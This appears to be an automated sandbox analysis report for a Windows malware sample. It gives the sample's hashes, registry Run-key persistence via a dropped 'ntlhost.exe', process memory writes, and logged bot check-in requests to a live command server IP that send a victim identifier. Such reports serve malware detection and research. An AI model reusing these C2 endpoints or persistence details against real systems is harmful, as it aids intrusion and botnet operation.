Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
03/02/2023, 14:00 UTC
Static task
static1
Behavioral task
behavioral1
Sample
33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe
Resource
win10v2004-20220901-en
General
-
Target
33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe
-
Size
1.8MB
-
MD5
93d72e8488c9e0d46eafbc0c4e4d587b
-
SHA1
4cff0799e86f0f0bdfe2679fffa348c318be8e0d
-
SHA256
33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a
-
SHA512
74b01081326194c9f95bd69ff777e6df6ca9cfcf9e4e6f65fb8ba62a7d542ce7a9d21da5e791bf2430d4524d3afb35a55026e384cc6543c8fafe25b976d3fa73
-
SSDEEP
49152:3yy5PZx+dW5BvZelG955YIby5+K+VcvUU:B5SdWDvZel05Lbykfuv
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 480 ntlhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" 33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 25 Go-http-client/1.1 -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2496 wrote to memory of 480 2496 33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe 87 PID 2496 wrote to memory of 480 2496 33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe 87 PID 2496 wrote to memory of 480 2496 33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe"C:\Users\Admin\AppData\Local\Temp\33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe2⤵
- Executes dropped EXE
PID:480
-
Network
-
Remote address:45.87.154.105:80RequestGET /bot/regex HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 14:01:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Adminntlhost.exeRemote address:45.87.154.105:80RequestGET /bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 14:01:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:45.87.154.105:80RequestGET /bot/regex HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 14:02:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Adminntlhost.exeRemote address:45.87.154.105:80RequestGET /bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 14:02:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:45.87.154.105:80RequestGET /bot/regex HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 14:03:18 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Adminntlhost.exeRemote address:45.87.154.105:80RequestGET /bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 03 Feb 2023 14:03:18 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
322 B 7
-
322 B 7
-
45.87.154.105:80http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Adminhttpntlhost.exe1.5kB 3.5kB 14 13
HTTP Request
GET http://45.87.154.105/bot/regexHTTP Response
200HTTP Request
GET http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\AdminHTTP Response
200HTTP Request
GET http://45.87.154.105/bot/regexHTTP Response
200HTTP Request
GET http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\AdminHTTP Response
200HTTP Request
GET http://45.87.154.105/bot/regexHTTP Response
200HTTP Request
GET http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\AdminHTTP Response
200 -
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
744.8MB
MD5768bf515685ca0420a4a2c7e4aa62e37
SHA1f6d380b1311561033a927d5336eb744e6aba9733
SHA256a27aaa02ea6ffa4c2928502adf5a1cd01418b76752a55d80d77688afbdae488a
SHA5126c5c8e7b896c66cfc228d7dec09f352938aaa36fa90cabae88a23b11a7103bb6918a4fb62692ab68c8102d639ab318bb061a8b1dce4b55d3c31f27e55170edf0
-
Filesize
744.8MB
MD5768bf515685ca0420a4a2c7e4aa62e37
SHA1f6d380b1311561033a927d5336eb744e6aba9733
SHA256a27aaa02ea6ffa4c2928502adf5a1cd01418b76752a55d80d77688afbdae488a
SHA5126c5c8e7b896c66cfc228d7dec09f352938aaa36fa90cabae88a23b11a7103bb6918a4fb62692ab68c8102d639ab318bb061a8b1dce4b55d3c31f27e55170edf0